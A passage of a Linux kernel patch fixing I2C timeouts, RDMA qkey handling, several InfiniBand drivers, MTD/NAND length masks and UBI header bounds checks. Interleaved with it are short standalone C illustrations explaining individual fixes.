++#define CTRL_CUM_TIME_OUT_400K_TICKS		76
++#define CTRL_CUM_TIME_OUT_1000K_TICKS		76
+ 
+ /*
+  * TARGET_CUM_TIME_OUT_XK_TICKS defines SMBus Target Cumulative Time-Out duration.
+  * SMBus Target Cumulative Time-Out duration = TARGET_CUM_TIME_OUT_XK_TICKS[7:0] x
+  * Baud_Clock_Period x 4096
+  */
+-#define TARGET_CUM_TIME_OUT_100K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_400K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_1000K_TICKS	199
++#define TARGET_CUM_TIME_OUT_100K_TICKS	95
++#define TARGET_CUM_TIME_OUT_400K_TICKS	95
++#define TARGET_CUM_TIME_OUT_1000K_TICKS	95
+ 
+ /*
+  * CLOCK_HIGH_TIME_OUT_XK defines Clock High time out period.
+  * Clock High time out period = CLOCK_HIGH_TIME_OUT_XK[7:0] x Baud_Clock_Period x 8
+  */
+-#define CLOCK_HIGH_TIME_OUT_100K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_400K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	204
++#define CLOCK_HIGH_TIME_OUT_100K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_400K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	97
+ 
+ #define TO_SCALING_100K		\
+ 	((BUS_IDLE_MIN_100K_TICKS << 24) | (CTRL_CUM_TIME_OUT_100K_TICKS << 16) | \
+diff --git a/drivers/i2c/busses/i2c-ocores.c b/drivers/i2c/busses/i2c-ocores.c
+index a0af027db04c1..2e575856c5cd5 100644
+--- a/drivers/i2c/busses/i2c-ocores.c
++++ b/drivers/i2c/busses/i2c-ocores.c
+@@ -342,18 +342,18 @@ static int ocores_poll_wait(struct ocores_i2c *i2c)
+  * ocores_isr(), we just add our polling code around it.
+  *
+  * It can run in atomic context
++ *
++ * Return: 0 on success, -ETIMEDOUT on timeout
+  */
+-static void ocores_process_polling(struct ocores_i2c *i2c)
++static int ocores_process_polling(struct ocores_i2c *i2c)
+ {
+-	while (1) {
+-		irqreturn_t ret;
+-		int err;
++	irqreturn_t ret;
++	int err = 0;
+ 
++	while (1) {
+ 		err = ocores_poll_wait(i2c);
+-		if (err) {
+-			i2c->state = STATE_ERROR;
++		if (err)
+ 			break; /* timeout */
+-		}
+ 
+ 		ret = ocores_isr(-1, i2c);
+ 		if (ret == IRQ_NONE)
+@@ -364,13 +364,15 @@ static void ocores_process_polling(struct ocores_i2c *i2c)
+ 					break;
+ 		}
+ 	}
++
++	return err;
+ }
+ 
+ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 			    struct i2c_msg *msgs, int num,
+ 			    bool polling)
+ {
+-	int ret;
++	int ret = 0;
+ 	u8 ctrl;
+ 
+ 	ctrl = oc_getreg(i2c, OCI2C_CONTROL);
+@@ -388,15 +390,16 @@ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_START);
+ 
+ 	if (polling) {
+-		ocores_process_polling(i2c);
++		ret = ocores_process_polling(i2c);
+ 	} else {
+-		ret = wait_event_timeout(i2c->wait,
+-					 (i2c->state == STATE_ERROR) ||
+-					 (i2c->state == STATE_DONE), HZ);
+-		if (ret == 0) {
+-			ocores_process_timeout(i2c);
+-			return -ETIMEDOUT;
+-		}
++		if (wait_event_timeout(i2c->wait,
++				       (i2c->state == STATE_ERROR) ||
++				       (i2c->state == STATE_DONE), HZ) == 0)
++			ret = -ETIMEDOUT;
++	}
++	if (ret) {
++		ocores_process_timeout(i2c);
++		return ret;
+ 	}
+ 
+ 	return (i2c->state == STATE_DONE) ? num : -EIO;
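[Standalone illustration, not part of the patch] The ocores change above turns the polling loop from a state-mutating void function into one that reports -ETIMEDOUT, so the polled and interrupt-driven paths share a single timeout/cleanup path in the caller. A sketch of that pattern, where poll_hw() is a hypothetical stand-in for ocores_poll_wait():

    #include <errno.h>
    #include <stdio.h>

    static int poll_hw(int attempts_left)
    {
        return attempts_left > 0 ? 0 : -ETIMEDOUT;
    }

    static int process_polling(int budget)
    {
        int err = 0;

        while (1) {
            err = poll_hw(budget--);
            if (err)
                break;          /* timeout: report it, don't hide it */
            if (budget == 3)    /* pretend the transfer completed */
                return 0;
        }
        return err;
    }

    int main(void)
    {
        int ret = process_polling(2);   /* budget too small: times out */

        if (ret) {
            fprintf(stderr, "transfer failed: %d (shared cleanup runs here)\n", ret);
            return 1;
        }
        return 0;
    }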
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 8730674ceb2e1..c6a671edba5c8 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -624,22 +624,11 @@ static inline unsigned short cma_family(struct rdma_id_private *id_priv)
+ 	return id_priv->id.route.addr.src_addr.ss_family;
+ }
+ 
+-static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++static int cma_set_default_qkey(struct rdma_id_private *id_priv)
+ {
+ 	struct ib_sa_mcmember_rec rec;
+ 	int ret = 0;
+ 
+-	if (id_priv->qkey) {
+-		if (qkey && id_priv->qkey != qkey)
+-			return -EINVAL;
+-		return 0;
+-	}
+-
+-	if (qkey) {
+-		id_priv->qkey = qkey;
+-		return 0;
+-	}
+-
+ 	switch (id_priv->id.ps) {
+ 	case RDMA_PS_UDP:
+ 	case RDMA_PS_IB:
+@@ -659,6 +648,16 @@ static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
+ 	return ret;
+ }
+ 
++static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++{
++	if (!qkey ||
++	    (id_priv->qkey && (id_priv->qkey != qkey)))
++		return -EINVAL;
++
++	id_priv->qkey = qkey;
++	return 0;
++}
++
+ static void cma_translate_ib(struct sockaddr_ib *sib, struct rdma_dev_addr *dev_addr)
+ {
+ 	dev_addr->dev_type = ARPHRD_INFINIBAND;
+@@ -1229,7 +1228,7 @@ static int cma_ib_init_qp_attr(struct rdma_id_private *id_priv,
+ 	*qp_attr_mask = IB_QP_STATE | IB_QP_PKEY_INDEX | IB_QP_PORT;
+ 
+ 	if (id_priv->id.qp_type == IB_QPT_UD) {
+-		ret = cma_set_qkey(id_priv, 0);
++		ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 
+@@ -4558,7 +4557,10 @@ static int cma_send_sidr_rep(struct rdma_id_private *id_priv,
+ 	memset(&rep, 0, sizeof rep);
+ 	rep.status = status;
+ 	if (status == IB_SIDR_SUCCESS) {
+-		ret = cma_set_qkey(id_priv, qkey);
++		if (qkey)
++			ret = cma_set_qkey(id_priv, qkey);
++		else
++			ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 		rep.qp_num = id_priv->qp_num;
+@@ -4763,9 +4765,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	enum ib_gid_type gid_type;
+ 	struct net_device *ndev;
+ 
+-	if (!status)
+-		status = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
+-	else
++	if (status)
+ 		pr_debug_ratelimited("RDMA CM: MULTICAST_ERROR: failed to join multicast. status %d\n",
+ 				     status);
+ 
+@@ -4793,7 +4793,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	}
+ 
+ 	event->param.ud.qp_num = 0xFFFFFF;
+-	event->param.ud.qkey = be32_to_cpu(multicast->rec.qkey);
++	event->param.ud.qkey = id_priv->qkey;
+ 
+ out:
+ 	if (ndev)
+@@ -4812,8 +4812,11 @@ static int cma_ib_mc_handler(int status, struct ib_sa_multicast *multicast)
+ 	    READ_ONCE(id_priv->state) == RDMA_CM_DESTROYING)
+ 		goto out;
+ 
+-	cma_make_mc_event(status, id_priv, multicast, &event, mc);
+-	ret = cma_cm_event_handler(id_priv, &event);
++	ret = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
++	if (!ret) {
++		cma_make_mc_event(status, id_priv, multicast, &event, mc);
++		ret = cma_cm_event_handler(id_priv, &event);
++	}
+ 	rdma_destroy_ah_attr(&event.param.ud.ah_attr);
+ 	WARN_ON(ret);
+ 
+@@ -4866,9 +4869,11 @@ static int cma_join_ib_multicast(struct rdma_id_private *id_priv,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = cma_set_qkey(id_priv, 0);
+-	if (ret)
+-		return ret;
++	if (!id_priv->qkey) {
++		ret = cma_set_default_qkey(id_priv);
++		if (ret)
++			return ret;
++	}
+ 
+ 	cma_set_mgid(id_priv, (struct sockaddr *) &mc->addr, &rec.mgid);
+ 	rec.qkey = cpu_to_be32(id_priv->qkey);
+@@ -4945,9 +4950,6 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	cma_iboe_set_mgid(addr, &ib.rec.mgid, gid_type);
+ 
+ 	ib.rec.pkey = cpu_to_be16(0xffff);
+-	if (id_priv->id.ps == RDMA_PS_UDP)
+-		ib.rec.qkey = cpu_to_be32(RDMA_UDP_QKEY);
+-
+ 	if (dev_addr->bound_dev_if)
+ 		ndev = dev_get_by_index(dev_addr->net, dev_addr->bound_dev_if);
+ 	if (!ndev)
+@@ -4973,6 +4975,9 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	if (err || !ib.rec.mtu)
+ 		return err ?: -EINVAL;
+ 
++	if (!id_priv->qkey)
++		cma_set_default_qkey(id_priv);
++
+ 	rdma_ip2gid((struct sockaddr *)&id_priv->id.route.addr.src_addr,
+ 		    &ib.rec.port_gid);
+ 	INIT_WORK(&mc->iboe_join.work, cma_iboe_join_work_handler);
+@@ -4998,6 +5003,9 @@ int rdma_join_multicast(struct rdma_cm_id *id, struct sockaddr *addr,
+ 			    READ_ONCE(id_priv->state) != RDMA_CM_ADDR_RESOLVED))
+ 		return -EINVAL;
+ 
++	if (id_priv->id.qp_type != IB_QPT_UD)
++		return -EINVAL;
++
+ 	mc = kzalloc(sizeof(*mc), GFP_KERNEL);
+ 	if (!mc)
+ 		return -ENOMEM;
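[Standalone illustration, not part of the patch] The cma.c rework above splits qkey handling in two: an explicit qkey must be non-zero and may not contradict one already set, while a default qkey is derived only when the caller supplied none. A sketch of the split — the struct and helpers are simplified stand-ins for the rdma_cm internals:

    #include <errno.h>
    #include <stdio.h>

    #define RDMA_UDP_QKEY 0x01234567u /* qkey the RDMA CM uses for UDP-style port spaces */

    struct id_priv { unsigned qkey; };

    static int set_qkey(struct id_priv *id, unsigned qkey)
    {
        if (!qkey || (id->qkey && id->qkey != qkey))
            return -EINVAL;
        id->qkey = qkey;
        return 0;
    }

    static int set_default_qkey(struct id_priv *id)
    {
        id->qkey = RDMA_UDP_QKEY; /* simplified: real code switches on port space */
        return 0;
    }

    int main(void)
    {
        struct id_priv id = { 0 };

        if (!id.qkey)
            set_default_qkey(&id);
        printf("default qkey: 0x%x\n", id.qkey);
        printf("conflicting explicit qkey: %d\n", set_qkey(&id, 0xdead)); /* -EINVAL */
        return 0;
    }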
+diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c
+index 11b1c1603aeb4..b99b3cc283b65 100644
+--- a/drivers/infiniband/core/verbs.c
++++ b/drivers/infiniband/core/verbs.c
+@@ -532,6 +532,8 @@ static struct ib_ah *_rdma_create_ah(struct ib_pd *pd,
+ 	else
+ 		ret = device->ops.create_ah(ah, &init_attr, NULL);
+ 	if (ret) {
++		if (ah->sgid_attr)
++			rdma_put_gid_attr(ah->sgid_attr);
+ 		kfree(ah);
+ 		return ERR_PTR(ret);
+ 	}
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index e788887732e1f..c533c693e5e38 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -420,7 +420,7 @@ struct erdma_reg_mr_sqe {
+ };
+ 
+ /* EQ related. */
+-#define ERDMA_DEFAULT_EQ_DEPTH 256
++#define ERDMA_DEFAULT_EQ_DEPTH 4096
+ 
+ /* ceqe */
+ #define ERDMA_CEQE_HDR_DB_MASK BIT_ULL(63)
+diff --git a/drivers/infiniband/hw/erdma/erdma_main.c b/drivers/infiniband/hw/erdma/erdma_main.c
+index 49778bb294ae4..49d9319217414 100644
+--- a/drivers/infiniband/hw/erdma/erdma_main.c
++++ b/drivers/infiniband/hw/erdma/erdma_main.c
+@@ -56,7 +56,7 @@ done:
+ static int erdma_enum_and_get_netdev(struct erdma_dev *dev)
+ {
+ 	struct net_device *netdev;
+-	int ret = -ENODEV;
++	int ret = -EPROBE_DEFER;
+ 
+ 	/* Already binded to a net_device, so we skip. */
+ 	if (dev->netdev)
+diff --git a/drivers/infiniband/hw/erdma/erdma_qp.c b/drivers/infiniband/hw/erdma/erdma_qp.c
+index 5fe1a339a4354..e3b0baa703e68 100644
+--- a/drivers/infiniband/hw/erdma/erdma_qp.c
++++ b/drivers/infiniband/hw/erdma/erdma_qp.c
+@@ -402,7 +402,7 @@ static int erdma_push_one_sqe(struct erdma_qp *qp, u16 *pi,
+ 			FIELD_PREP(ERDMA_SQE_MR_MTT_CNT_MASK,
+ 				   mr->mem.mtt_nents);
+ 
+-		if (mr->mem.mtt_nents < ERDMA_MAX_INLINE_MTT_ENTRIES) {
++		if (mr->mem.mtt_nents <= ERDMA_MAX_INLINE_MTT_ENTRIES) {
+ 			attrs |= FIELD_PREP(ERDMA_SQE_MR_MTT_TYPE_MASK, 0);
+ 			/* Copy SGLs to SQE content to accelerate */
+ 			memcpy(get_queue_entry(qp->kern_qp.sq_buf, idx + 1,
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.h b/drivers/infiniband/hw/erdma/erdma_verbs.h
+index ab6380635e9e6..eabab8bba95af 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.h
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.h
+@@ -11,7 +11,7 @@
+ 
+ /* RDMA Capability. */
+ #define ERDMA_MAX_PD (128 * 1024)
+-#define ERDMA_MAX_SEND_WR 4096
++#define ERDMA_MAX_SEND_WR 8192
+ #define ERDMA_MAX_ORD 128
+ #define ERDMA_MAX_IRD 128
+ #define ERDMA_MAX_SGE_RD 1
+diff --git a/drivers/infiniband/hw/irdma/cm.c b/drivers/infiniband/hw/irdma/cm.c
+index 195aa9ea18b6c..8817864154af1 100644
+--- a/drivers/infiniband/hw/irdma/cm.c
++++ b/drivers/infiniband/hw/irdma/cm.c
+@@ -1458,13 +1458,15 @@ static int irdma_send_fin(struct irdma_cm_node *cm_node)
+  * irdma_find_listener - find a cm node listening on this addr-port pair
+  * @cm_core: cm's core
+  * @dst_addr: listener ip addr
++ * @ipv4: flag indicating IPv4 when true
+  * @dst_port: listener tcp port num
+  * @vlan_id: virtual LAN ID
+  * @listener_state: state to match with listen node's
+  */
+ static struct irdma_cm_listener *
+-irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+-		    u16 vlan_id, enum irdma_cm_listener_state listener_state)
++irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, bool ipv4,
++		    u16 dst_port, u16 vlan_id,
++		    enum irdma_cm_listener_state listener_state)
+ {
+ 	struct irdma_cm_listener *listen_node;
+ 	static const u32 ip_zero[4] = { 0, 0, 0, 0 };
+@@ -1477,7 +1479,7 @@ irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+ 	list_for_each_entry (listen_node, &cm_core->listen_list, list) {
+ 		memcpy(listen_addr, listen_node->loc_addr, sizeof(listen_addr));
+ 		listen_port = listen_node->loc_port;
+-		if (listen_port != dst_port ||
++		if (listen_node->ipv4 != ipv4 || listen_port != dst_port ||
+ 		    !(listener_state & listen_node->listener_state))
+ 			continue;
+ 		/* compare node pair, return node handle if a match */
+@@ -2902,9 +2904,10 @@ irdma_make_listen_node(struct irdma_cm_core *cm_core,
+ 	unsigned long flags;
+ 
+ 	/* cannot have multiple matching listeners */
+-	listener = irdma_find_listener(cm_core, cm_info->loc_addr,
+-				       cm_info->loc_port, cm_info->vlan_id,
+-				       IRDMA_CM_LISTENER_EITHER_STATE);
++	listener =
++		irdma_find_listener(cm_core, cm_info->loc_addr, cm_info->ipv4,
++				    cm_info->loc_port, cm_info->vlan_id,
++				    IRDMA_CM_LISTENER_EITHER_STATE);
+ 	if (listener &&
+ 	    listener->listener_state == IRDMA_CM_LISTENER_ACTIVE_STATE) {
+ 		refcount_dec(&listener->refcnt);
+@@ -3153,6 +3156,7 @@ void irdma_receive_ilq(struct irdma_sc_vsi *vsi, struct irdma_puda_buf *rbuf)
+ 
+ 		listener = irdma_find_listener(cm_core,
+ 					       cm_info.loc_addr,
++					       cm_info.ipv4,
+ 					       cm_info.loc_port,
+ 					       cm_info.vlan_id,
+ 					       IRDMA_CM_LISTENER_ACTIVE_STATE);
+diff --git a/drivers/infiniband/hw/irdma/cm.h b/drivers/infiniband/hw/irdma/cm.h
+index 19c284975fc7c..7feadb3e1eda3 100644
+--- a/drivers/infiniband/hw/irdma/cm.h
++++ b/drivers/infiniband/hw/irdma/cm.h
+@@ -41,7 +41,7 @@
+ #define TCP_OPTIONS_PADDING	3
+ 
+ #define IRDMA_DEFAULT_RETRYS	64
+-#define IRDMA_DEFAULT_RETRANS	8
++#define IRDMA_DEFAULT_RETRANS	32
+ #define IRDMA_DEFAULT_TTL		0x40
+ #define IRDMA_DEFAULT_RTT_VAR		6
+ #define IRDMA_DEFAULT_SS_THRESH		0x3fffffff
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 2e1e2bad04011..43dfa4761f069 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -41,6 +41,7 @@ static enum irdma_hmc_rsrc_type iw_hmc_obj_types[] = {
+ 	IRDMA_HMC_IW_XFFL,
+ 	IRDMA_HMC_IW_Q1,
+ 	IRDMA_HMC_IW_Q1FL,
++	IRDMA_HMC_IW_PBLE,
+ 	IRDMA_HMC_IW_TIMER,
+ 	IRDMA_HMC_IW_FSIMC,
+ 	IRDMA_HMC_IW_FSIAV,
+@@ -827,6 +828,8 @@ static int irdma_create_hmc_objs(struct irdma_pci_f *rf, bool privileged,
+ 	info.entry_type = rf->sd_type;
+ 
+ 	for (i = 0; i < IW_HMC_OBJ_TYPE_NUM; i++) {
++		if (iw_hmc_obj_types[i] == IRDMA_HMC_IW_PBLE)
++			continue;
+ 		if (dev->hmc_info->hmc_obj[iw_hmc_obj_types[i]].cnt) {
+ 			info.rsrc_type = iw_hmc_obj_types[i];
+ 			info.count = dev->hmc_info->hmc_obj[info.rsrc_type].cnt;
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 445e69e864097..7887230c867b1 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -2595,7 +2595,10 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 			/* remove the SQ WR by moving SQ tail*/
+ 			IRDMA_RING_SET_TAIL(*sq_ring,
+ 				sq_ring->tail + qp->sq_wrtrk_array[sq_ring->tail].quanta);
+-
++			if (cmpl->cpi.op_type == IRDMAQP_OP_NOP) {
++				kfree(cmpl);
++				continue;
++			}
+ 			ibdev_dbg(iwqp->iwscq->ibcq.device,
+ 				  "DEV: %s: adding wr_id = 0x%llx SQ Completion to list qp_id=%d\n",
+ 				  __func__, cmpl->cpi.wr_id, qp->qp_id);
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index c669ef6e47e73..eaa35e1df2a85 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -442,6 +442,10 @@ static int translate_eth_ext_proto_oper(u32 eth_proto_oper, u16 *active_speed,
+ 		*active_width = IB_WIDTH_2X;
+ 		*active_speed = IB_SPEED_NDR;
+ 		break;
++	case MLX5E_PROT_MASK(MLX5E_400GAUI_8):
++		*active_width = IB_WIDTH_8X;
++		*active_speed = IB_SPEED_HDR;
++		break;
+ 	case MLX5E_PROT_MASK(MLX5E_400GAUI_4_400GBASE_CR4_KR4):
+ 		*active_width = IB_WIDTH_4X;
+ 		*active_speed = IB_SPEED_NDR;
+diff --git a/drivers/mtd/mtdblock.c b/drivers/mtd/mtdblock.c
+index 1e94e7d10b8be..a0a1194dc1d90 100644
+--- a/drivers/mtd/mtdblock.c
++++ b/drivers/mtd/mtdblock.c
+@@ -153,7 +153,7 @@ static int do_cached_write (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 				mtdblk->cache_state = STATE_EMPTY;
+ 				ret = mtd_read(mtd, sect_start, sect_size,
+ 					       &retlen, mtdblk->cache_data);
+-				if (ret)
++				if (ret && !mtd_is_bitflip(ret))
+ 					return ret;
+ 				if (retlen != sect_size)
+ 					return -EIO;
+@@ -188,8 +188,12 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 	pr_debug("mtdblock: read on \"%s\" at 0x%lx, size 0x%x\n",
+ 			mtd->name, pos, len);
+ 
+-	if (!sect_size)
+-		return mtd_read(mtd, pos, len, &retlen, buf);
++	if (!sect_size) {
++		ret = mtd_read(mtd, pos, len, &retlen, buf);
++		if (ret && !mtd_is_bitflip(ret))
++			return ret;
++		return 0;
++	}
+ 
+ 	while (len > 0) {
+ 		unsigned long sect_start = (pos/sect_size)*sect_size;
+@@ -209,7 +213,7 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 			memcpy (buf, mtdblk->cache_data + offset, size);
+ 		} else {
+ 			ret = mtd_read(mtd, pos, size, &retlen, buf);
+-			if (ret)
++			if (ret && !mtd_is_bitflip(ret))
+ 				return ret;
+ 			if (retlen != size)
+ 				return -EIO;
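[Standalone illustration, not part of the patch] mtd_read() returns -EUCLEAN when ECC corrected bitflips, i.e. the data delivered is still valid; the mtdblock hunks above stop treating that as a fatal read error. A sketch of the rule, where fake_mtd_read() stands in for mtd_read():

    #include <errno.h>
    #include <stdio.h>

    #ifndef EUCLEAN
    #define EUCLEAN 117 /* Linux errno; MTD reuses it for corrected bitflips */
    #endif

    static int fake_mtd_read(int simulate)
    {
        return simulate; /* 0, -EUCLEAN, or -EIO for this demo */
    }

    static int cached_read(int simulate)
    {
        int ret = fake_mtd_read(simulate);

        if (ret && ret != -EUCLEAN)
            return ret;     /* hard failure */
        return 0;           /* clean read, or corrected bitflip: data usable */
    }

    int main(void)
    {
        printf("clean:   %d\n", cached_read(0));
        printf("bitflip: %d\n", cached_read(-EUCLEAN));
        printf("io err:  %d\n", cached_read(-EIO));
        return 0;
    }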
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index a28574c009003..074e14225c06a 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -280,7 +280,7 @@ static void meson_nfc_cmd_access(struct nand_chip *nand, int raw, bool dir,
+ 
+ 	if (raw) {
+ 		len = mtd->writesize + mtd->oobsize;
+-		cmd = (len & GENMASK(5, 0)) | scrambler | DMA_DIR(dir);
++		cmd = (len & GENMASK(13, 0)) | scrambler | DMA_DIR(dir);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 		return;
+ 	}
+@@ -544,7 +544,7 @@ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		goto out;
+ 
+-	cmd = NFC_CMD_N2M | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_N2M | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
+@@ -568,7 +568,7 @@ static int meson_nfc_write_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		return ret;
+ 
+-	cmd = NFC_CMD_M2N | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_M2N | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
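[Standalone illustration, not part of the patch] The meson_nand fix widens the command register's length mask from 6 to 14 bits: with GENMASK(5, 0), any transfer longer than 63 bytes had its length field silently truncated. A demonstration — the GENMASK here is a simplified stand-in assuming a 64-bit unsigned long, not the kernel's definition:

    #include <stdio.h>

    #define GENMASK(h, l)  ((~0UL >> (63 - (h))) & (~0UL << (l)))

    int main(void)
    {
        unsigned long len = 2048 + 64;   /* writesize + oobsize for a 2K page */

        /* Old mask: only 6 bits survive, so the NFC saw a bogus length. */
        printf("len & GENMASK(5, 0)  = %lu\n", len & GENMASK(5, 0));   /* 0 */
        /* New mask: the length field is actually 14 bits wide. */
        printf("len & GENMASK(13, 0) = %lu\n", len & GENMASK(13, 0));  /* 2112 */
        return 0;
    }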
+diff --git a/drivers/mtd/nand/raw/stm32_fmc2_nand.c b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+index 5d627048c420d..9e74bcd90aaa2 100644
+--- a/drivers/mtd/nand/raw/stm32_fmc2_nand.c
++++ b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+@@ -1531,6 +1531,9 @@ static int stm32_fmc2_nfc_setup_interface(struct nand_chip *chip, int chipnr,
+ 	if (IS_ERR(sdrt))
+ 		return PTR_ERR(sdrt);
+ 
++	if (conf->timings.mode > 3)
++		return -EOPNOTSUPP;
++
+ 	if (chipnr == NAND_DATA_IFACE_CHECK_ONLY)
+ 		return 0;
+ 
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index 7f65af1697519..1662c12e24ada 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -664,12 +664,6 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
+-	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
+-	    ubi->vid_hdr_alsize)) {
+-		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
+-		return -EINVAL;
+-	}
+-
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+@@ -687,6 +681,21 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 						ubi->vid_hdr_aloffset;
+ 	}
+ 
++	/*
++	 * Memory allocation for VID header is ubi->vid_hdr_alsize
++	 * which is described in comments in io.c.
++	 * Make sure VID header shift + UBI_VID_HDR_SIZE not exceeds
++	 * ubi->vid_hdr_alsize, so that all vid header operations
++	 * won't access memory out of bounds.
++	 */
++	if ((ubi->vid_hdr_shift + UBI_VID_HDR_SIZE) > ubi->vid_hdr_alsize) {
++		ubi_err(ubi, "Invalid VID header offset %d, VID header shift(%d)"
++			" + VID header size(%zu) > VID header aligned size(%d).",
++			ubi->vid_hdr_offset, ubi->vid_hdr_shift,
++			UBI_VID_HDR_SIZE, ubi->vid_hdr_alsize);
++		return -EINVAL;
++	}
++
+ 	/* Similar for the data offset */
+ 	ubi->leb_start = ubi->vid_hdr_offset + UBI_VID_HDR_SIZE;
+ 	ubi->leb_start = ALIGN(ubi->leb_start, ubi->min_io_size);
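[Standalone illustration, not part of the patch] The UBI check added above enforces that the VID header, written at vid_hdr_shift inside a buffer of vid_hdr_alsize bytes, stays in bounds. A sketch of the arithmetic, assuming a power-of-two min I/O size and the 64-byte UBI_VID_HDR_SIZE of current kernels:

    #include <stdio.h>

    #define ALIGN(x, a)        (((x) + (a) - 1) / (a) * (a))
    #define UBI_VID_HDR_SIZE   64u

    int main(void)
    {
        unsigned int min_io = 512;
        unsigned int vid_hdr_offset = 2021;                        /* hostile value */
        unsigned int aloffset = vid_hdr_offset / min_io * min_io;  /* 1536 */
        unsigned int shift = vid_hdr_offset - aloffset;            /* 485 */
        unsigned int alsize = ALIGN(UBI_VID_HDR_SIZE, min_io);     /* 512 */

        if (shift + UBI_VID_HDR_SIZE > alsize)
            printf("rejected: shift %u + %u > buffer %u\n",
                   shift, UBI_VID_HDR_SIZE, alsize);
        else
            printf("ok\n");
        return 0;
    }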
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 9e14319225c97..6049ab9e46479 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -575,7 +575,7 @@ static int erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk,
+  * @vol_id: the volume ID that last used this PEB
+  * @lnum: the last used logical eraseblock number for the PEB
+  * @torture: if the physical eraseblock has to be tortured
+- * @nested: denotes whether the work_sem is already held in read mode
++ * @nested: denotes whether the work_sem is already held
+  *
+  * This function returns zero in case of success and a %-ENOMEM in case of
+  * failure.
+@@ -1131,7 +1131,7 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		int err1;
+ 
+ 		/* Re-schedule the LEB for erasure */
+-		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
++		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, true);
+ 		if (err1) {
